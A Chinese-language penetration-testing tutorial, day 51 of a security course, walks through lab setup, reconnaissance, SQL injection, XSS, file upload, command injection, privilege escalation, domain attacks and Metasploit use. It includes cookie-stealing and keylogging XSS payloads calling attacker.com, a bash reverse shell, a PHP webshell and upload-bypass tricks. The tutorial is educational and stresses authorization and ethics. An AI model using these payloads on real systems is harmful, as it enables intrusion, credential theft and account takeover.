Day-053-Web 安全综合实战

# Day 51: Web 安全综合实战

> Web 安全系列第 21 天 | 预计阅读时间：40 分钟 | 难度：★★★★☆

---

## 清单 目录

1. [综合实战概述](#综合实战概述)
2. [靶场环境搭建](#靶场环境搭建)
3. [信息收集实战](#信息收集实战)
4. [漏洞挖掘实战](#漏洞挖掘实战)
5. [权限提升实战](#权限提升实战)
6. [内网渗透实战](#内网渗透实战)
7. [漏洞利用框架](#漏洞利用框架)
8. [实战案例分析](#实战案例分析)
9. [总结与思考](#总结与思考)
10. [参考资料](#参考资料)

---

## 综合实战概述

### 实战目标

**学习目标**：
```
1. 综合运用 Web 安全技术
   - 信息收集
   - 漏洞挖掘
   - 漏洞利用
   - 权限提升

2. 掌握完整渗透流程
   - 前期准备
   - 漏洞发现
   - 漏洞利用
   - 后渗透
   - 报告编写

3. 培养实战思维
   - 攻击者视角
   - 系统性思考
   - 问题解决能力
```

**实战环境**：
```
推荐靶场：
- DVWA (Damn Vulnerable Web Application)
- OWASP Juice Shop
- WebGoat
- VulnHub
- HackTheBox
- TryHackMe
```

### 渗透测试流程

**标准流程**：
```
1. 前期交互
   - 确定范围
   - 获取授权
   - 制定计划

2. 信息收集
   - 被动收集
   - 主动扫描
   - 枚举目标

3. 威胁建模
   - 资产识别
   - 威胁分析
   - 攻击面映射

4. 漏洞分析
   - 漏洞扫描
   - 手工验证
   - 风险评估

5. 渗透攻击
   - 漏洞利用
   - 权限提升
   - 横向移动

6. 后渗透
   - 数据收集
   - 持久化
   - 痕迹清理

7. 报告编写
   - 发现总结
   - 风险评估
   - 修复建议
```

---

## 靶场环境搭建

### DVWA 搭建

**什么是 DVWA**：
```
DVWA（Damn Vulnerable Web Application）
是一个 PHP/MySQL 漏洞 Web 应用。

特点：
- 多种漏洞类型
- 可调节难度
- 适合学习
- 本地部署
```

**Docker 部署**：
```bash
# 拉取镜像
docker pull vulnerables/web-dvwa

# 启动容器
docker run --rm -it -p 80:80 vulnerables/web-dvwa

# 访问
http://localhost/setup.php
http://localhost/login.php

# 默认账号
admin / password
```

**手动部署**：
```bash
# 克隆代码
git clone https://github.com/digininja/DVWA.git
cd DVWA

# 配置数据库
cp config/config.inc.php.dist config/config.inc.php
vim config/config.inc.php

# 配置数据库
$db_server = 'localhost';
$db_database = 'dvwa';
$db_user = 'root';
$db_pass = 'password';

# 创建数据库
mysql -u root -p
CREATE DATABASE dvwa;
GRANT ALL PRIVILEGES ON dvwa.* TO 'root'@'localhost' IDENTIFIED BY 'password';

# 初始化数据库
php database/create_database.php

# 启动 Web 服务器
php -S localhost:8000
```

### OWASP Juice Shop

**什么是 Juice Shop**：
```
OWASP Juice Shop 是现代 Web 应用漏洞靶场。

特点：
- 基于 Node.js
- 现代技术栈
- 多种漏洞
- 评分系统
```

**Docker 部署**：
```bash
# 拉取镜像
docker pull bkimminich/juice-shop

# 启动容器
docker run --rm -p 3000:3000 bkimminich/juice-shop

# 访问
http://localhost:3000
```

### WebGoat

**什么是 WebGoat**：
```
WebGoat 是 OWASP 维护的教学用漏洞 Web 应用。

特点：
- 课程式学习
- 每课一个漏洞
- 详细讲解
- 适合入门
```

**Docker 部署**：
```bash
# 拉取镜像
docker pull owasp/webgoat

# 启动容器
docker run --rm -p 8080:8080 owasp/webgoat

# 访问
http://localhost:8080/WebGoat
```

---

## 信息收集实战

### 被动信息收集

**域名信息**：
```bash
# WHOIS 查询
whois target.com

# DNS 记录
dig target.com ANY
nslookup target.com

# 子域名枚举
subfinder -d target.com
sublist3r -d target.com
amass enum -d target.com

# 历史记录
waybackurls target.com
gau target.com
```

**网络信息**：
```bash
# IP 信息
curl https://ipinfo.io/target.com

# ASN 信息
whois -h whois.radb.net -- '-i origin ASxxx'

# 网络范围
whois target.com | grep inetnum
```

**技术栈识别**：
```bash
# Wappalyzer (浏览器插件)
# 识别 CMS、框架、服务器等

# WhatWeb
whatweb target.com

# BuiltWith
# 在线服务识别技术栈
```

### 主动信息收集

**端口扫描**：
```bash
# Nmap 基础扫描
nmap -sV -sC target.com

# Nmap 全端口扫描
nmap -p- target.com

# Nmap 快速扫描
nmap -T4 -F target.com

# Masscan 快速扫描
masscan -p1-65535 target.com --rate=1000
```

**目录枚举**：
```bash
# gobuster
gobuster dir -u http://target.com -w wordlist.txt

# dirsearch
dirsearch -u http://target.com -e php,html,js

# ffuf
ffuf -u http://target.com/FUZZ -w wordlist.txt
```

**参数发现**：
```bash
# Arjun
arjun -u http://target.com

# parameth
parameth -u http://target.com

# 模糊测试
ffuf -u http://target.com/page?FUZZ=value -w params.txt
```

### 漏洞扫描

**自动化扫描**：
```bash
# OWASP ZAP
zap-cli quick-scan http://target.com
zap-cli report -o report.html -f html

# Nikto
nikto -h http://target.com

# SQLMap
sqlmap -u "http://target.com/page?id=1" --batch
```

**手工验证**：
```
扫描结果需要手工验证：
1. 确认漏洞存在
2. 评估影响范围
3. 编写利用代码
4. 记录复现步骤
```

---

## 漏洞挖掘实战

### SQL 注入实战

**发现注入点**：
```
测试 Payload：
' OR '1'='1
" OR "1"="1
' OR 1=1 --

观察：
- 页面内容变化
- 错误信息
- 响应时间
```

**利用流程**：
```bash
# 1. 确认注入
sqlmap -u "http://target.com/page?id=1" --batch

# 2. 获取数据库信息
sqlmap -u "http://target.com/page?id=1" --dbs

# 3. 获取表名
sqlmap -u "http://target.com/page?id=1" -D database --tables

# 4. 获取列名
sqlmap -u "http://target.com/page?id=1" -D database -T users --columns

# 5. 获取数据
sqlmap -u "http://target.com/page?id=1" -D database -T users --dump
```

### XSS 实战

**发现 XSS**：
```
测试 Payload：
<script>alert(1)</script>
<img src=x onerror=alert(1)>
"><script>alert(1)</script>

观察：
- 弹窗显示
- 页面内容变化
- 控制台错误
```

**利用流程**：
```javascript
// 1. 窃取 Cookie
<script>
  fetch('http://attacker.com/steal?cookie=' + document.cookie);
</script>

// 2. 钓鱼攻击
<script>
  document.body.innerHTML = `
    <form action="http://attacker.com/phish">
      <input type="password" name="password">
      <button>重新登录</button>
    </form>
  `;
</script>

// 3. 键盘记录
<script>
  document.addEventListener('keydown', function(e) {
    fetch('http://attacker.com/keylog?key=' + e.key);
  });
</script>
```

### 文件上传实战

**发现上传点**：
```
测试上传：
1. 正常文件（图片）
2. 恶意文件（PHP）
3. 图片马（GIF+PHP）

观察：
- 是否允许上传
- 文件存储路径
- 文件访问方式
```

**利用流程**：
```bash
# 1. 绕过扩展名检查
shell.php.jpg
shell.PHP
shell.php%00.jpg

# 2. 绕过 MIME 检查
Content-Type: image/jpeg

# 3. 添加魔术字节
GIF89a
<?php system($_GET['c']); ?>

# 4. 访问 Webshell
http://target.com/uploads/shell.php?c=whoami
```

### 命令注入实战

**发现注入点**：
```
测试 Payload：
; whoami
| whoami
$(whoami)

观察：
- 命令执行结果
- 页面内容变化
- 响应时间
```

**利用流程**：
```bash
# 1. 基础命令执行
?ip=127.0.0.1; whoami

# 2. 反弹 Shell
?ip=127.0.0.1; bash -i >& /dev/tcp/attacker/4444 0>&1

# 3. 文件读取
?ip=127.0.0.1; cat /etc/passwd

# 4. 文件写入
?ip=127.0.0.1; echo '<?php system($_GET["c"]); ?>' > shell.php
```

---

## 权限提升实战

### Web 权限提升

**敏感文件读取**：
```bash
# 配置文件
/config.php
/wp-config.php
/.env
/config/database.yml

# 密钥文件
/.ssh/id_rsa
/.aws/credentials
/config/secrets.yml

# 日志文件
/var/log/auth.log
/var/log/apache/access.log
```

**凭证获取**：
```bash
# 数据库凭证
# 从配置文件获取

# API 密钥
# 从代码/配置获取

# 用户凭证
# 从数据库获取
# 哈希破解
```

### 系统权限提升

**信息收集**：
```bash
# 系统信息
uname -a
cat /etc/os-release

# 用户信息
whoami
id
w

# 网络信息
ifconfig
netstat -an
```

**提权检查**：
```bash
# SUID 文件
find / -perm -4000 -type f 2>/dev/null

# sudo 权限
sudo -l

# 内核版本
uname -r
# 搜索对应提权漏洞
```

**提权利用**：
```bash
# SUID 提权
# 查找可利用 SUID 文件

# sudo 提权
# 查找可执行的命令

# 内核提权
# 使用对应 exploit
```

---

## 内网渗透实战

### 内网信息收集

**网络拓扑**：
```bash
# 路由表
route print
ip route

# ARP 缓存
arp -a
ip neigh

# 网络接口
ipconfig /all
ifconfig -a
```

**内网主机**：
```bash
# 扫描内网
nmap -sn 192.168.1.0/24

# 端口扫描
nmap -sV 192.168.1.0/24

# 快速扫描
masscan -p1-65535 192.168.1.0/24 --rate=1000
```

### 横向移动

**凭证传递**：
```bash
# Pass-the-Hash
# 使用哈希认证

# Pass-the-Ticket
# 使用 Kerberos 票据

# Over-pass-the-Hash
# 哈希换票据
```

**远程执行**：
```bash
# PsExec
psexec.py domain/user:password@target

# WMI
wmic /node:target process call create "cmd.exe /c whoami"

# SSH
ssh user@target
```

### 域渗透

**域信息收集**：
```bash
# 域信息
net config workstation
nltest /domain_trusts

# 域用户
net user /domain
net group /domain

# 域计算机
net group "Domain Computers" /domain
```

**域权限提升**：
```bash
# Kerberoasting
# 请求服务票据
# 离线破解

# AS-REP Roasting
# 请求 AS-REP
# 离线破解

# Golden Ticket
# 伪造 TGT
# 持久访问
```

---

## 漏洞利用框架

### Metasploit

**什么是 Metasploit**：
```
Metasploit 是最流行的渗透测试框架。

功能：
- 漏洞利用
- Payload 生成
- 后渗透模块
- 报告生成
```

**基本使用**：
```bash
# 启动 Metasploit
msfconsole

# 搜索漏洞
search eternalblue

# 选择利用模块
use exploit/windows/smb/ms17_010_eternalblue

# 配置参数
set RHOSTS 192.168.1.100
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.50

# 执行利用
exploit
```

### Cobalt Strike

**什么是 Cobalt Strike**：
```
Cobalt Strike 是商业渗透测试工具。

功能：
- Beacon 后门
- 横向移动
- 权限提升
- 报告生成
```

**基本使用**：
```
1. 启动 Team Server
2. 连接客户端
3. 生成 Beacon
4. 部署 Beacon
5. 后渗透操作
```

### Empire

**什么是 Empire**：
```
Empire 是 PowerShell 渗透测试框架。

功能：
- PowerShell 利用
- 后渗透模块
- 持久化
- 凭证窃取
```

**基本使用**：
```bash
# 启动 Empire
./empire

# 生成 Stager
usestager windows/launcher_bat

# 配置参数
set Listener http
set Stager bat

# 生成 Payload
generate
```

---

## 实战案例分析

### 案例 1: 电商平台渗透

**目标**：
```
某电商平台
目标：获取管理员权限
范围：Web 应用
```

**攻击流程**：
```
1. 信息收集
   - 子域名枚举
   - 端口扫描
   - 技术栈识别

2. 漏洞发现
   - SQL 注入（商品搜索）
   - XSS（评论功能）
   - 文件上传（头像）

3. 漏洞利用
   - SQL 注入获取数据库凭证
   - 登录后台
   - 文件上传获取 Shell

4. 权限提升
   - 读取配置文件
   - 获取数据库权限
   - 系统提权

5. 数据收集
   - 用户数据
   - 订单数据
   - 支付信息
```

### 案例 2: 企业内网渗透

**目标**：
```
某企业内网
目标：获取域控权限
范围：内网渗透
```

**攻击流程**：
```
1. 初始访问
   - 钓鱼邮件
   - Web 漏洞
   - 外部服务

2. 权限提升
   - 本地提权
   - 凭证窃取
   - 横向移动

3. 域渗透
   - 域信息收集
   - Kerberoasting
   - 黄金票据

4. 持久化
   - 后门账户
   - 计划任务
   - 注册表

5. 痕迹清理
   - 日志清理
   - 文件清理
   - 账户清理
```

---

## 总结与思考

### 核心要点回顾

1. **实战流程**
   - 信息收集
   - 漏洞挖掘
   - 漏洞利用
   - 权限提升

2. **工具使用**
   - 扫描工具
   - 利用框架
   - 后渗透工具

3. **实战思维**
   - 攻击者视角
   - 系统性思考
   - 问题解决

### 深入思考问题

1. **自动化 vs 手工**？
   - 自动化效率高
   - 手工发现深
   - 如何平衡

2. **道德与法律**？
   - 授权范围
   - 负责任披露
   - 法律风险

3. **持续学习**？
   - 新技术
   - 新漏洞
   - 新工具

### 实战建议

**初学者**：
1. 搭建靶场练习
2. 学习基础知识
3. 参加 CTF 比赛
4. 阅读 Writeup

**进阶者**：
1. 参与众测项目
2. 研究新漏洞
3. 开发工具
4. 分享经验

**专业人士**：
1. 保持学习
2. 遵守道德
3. 负责任披露
4. 培养新人

---

## 参考资料

### 学习资源
- [OWASP Testing Guide](https://owasp.org/www-project-web-security-testing-guide/)
- [PTES Standard](http://www.pentest-standard.org/)
- [HackTheBox](https://www.hackthebox.com/)

### 工具资源
- [Metasploit](https://www.metasploit.com/)
- [Burp Suite](https://portswigger.net/burp)
- [OWASP ZAP](https://www.zaproxy.org/)

### 漏洞报告编写

**报告结构**：
```markdown
# 渗透测试报告

## 执行摘要
- 测试时间
- 测试范围
- 发现概述
- 风险评级

## 技术发现
### 漏洞 1: SQL 注入
- 漏洞描述
- 复现步骤
- 影响评估
- 修复建议

### 漏洞 2: XSS
- 漏洞描述
- 复现步骤
- 影响评估
- 修复建议

## 风险评估
- 高：X 个
- 中：X 个
- 低：X 个

## 修复建议
- 短期修复
- 长期修复
- 最佳实践
```

**截图要求**：
```
1. 漏洞复现截图
2. 利用过程截图
3. 影响证明截图
4. 修复建议截图
```

### 道德与法律

**渗透测试道德**：
```
1. 获取书面授权
   - 明确测试范围
   - 明确测试时间
   - 明确测试方法

2. 保密协议
   - 保护客户信息
   - 不泄露漏洞
   - 不滥用发现

3. 负责任披露
   - 给修复时间
   - 协调披露
   - 保护用户
```

**法律风险**：
```
1. 未经授权访问
   - 计算机欺诈
   - 数据窃取
   - 系统破坏

2. 数据泄露
   - 隐私侵犯
   - 商业机密
   - 法律责任

3. 系统破坏
   - 服务中断
   - 数据丢失
   - 赔偿责任
```

**合法测试**：
```
1. 书面授权
   - 测试范围
   - 测试时间
   - 测试方法

2. 测试协议
   - 禁止行为
   - 紧急联系
   - 数据保护

3. 报告保密
   - 仅限授权人员
   - 安全传输
   - 安全存储
```

---

## 参考资料

### 学习资源
- [OWASP Testing Guide](https://owasp.org/www-project-web-security-testing-guide/)
- [PTES Standard](http://www.pentest-standard.org/)
- [HackTheBox](https://www.hackthebox.com/)
- [TryHackMe](https://tryhackme.com/)

### 工具资源
- [Metasploit](https://www.metasploit.com/)
- [Burp Suite](https://portswigger.net/burp)
- [OWASP ZAP](https://www.zaproxy.org/)
- [Nmap](https://nmap.org/)

### 书籍推荐
- 《渗透测试实践指南》
- 《Web 安全深度剖析》
- 《白帽子讲 Web 安全》
- 《The Web Application Hacker's Handbook》
- 《Penetration Testing: A Hands-On Introduction to Hacking》

### 在线资源
- [HackerOne](https://hackerone.com/)
- [Bugcrowd](https://www.bugcrowd.com/)
- [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings)
- [HackTricks](https://book.hacktricks.xyz/)

---

**标记 明日预告**：Day 52 - 移动安全基础

> 本文内容仅供学习和研究使用，请勿用于非法目的。所有实验请在隔离环境中进行。

---

*本文是 365 天信息安全技术系列的第 51 篇，Web 安全部分第 21 篇，精编版本*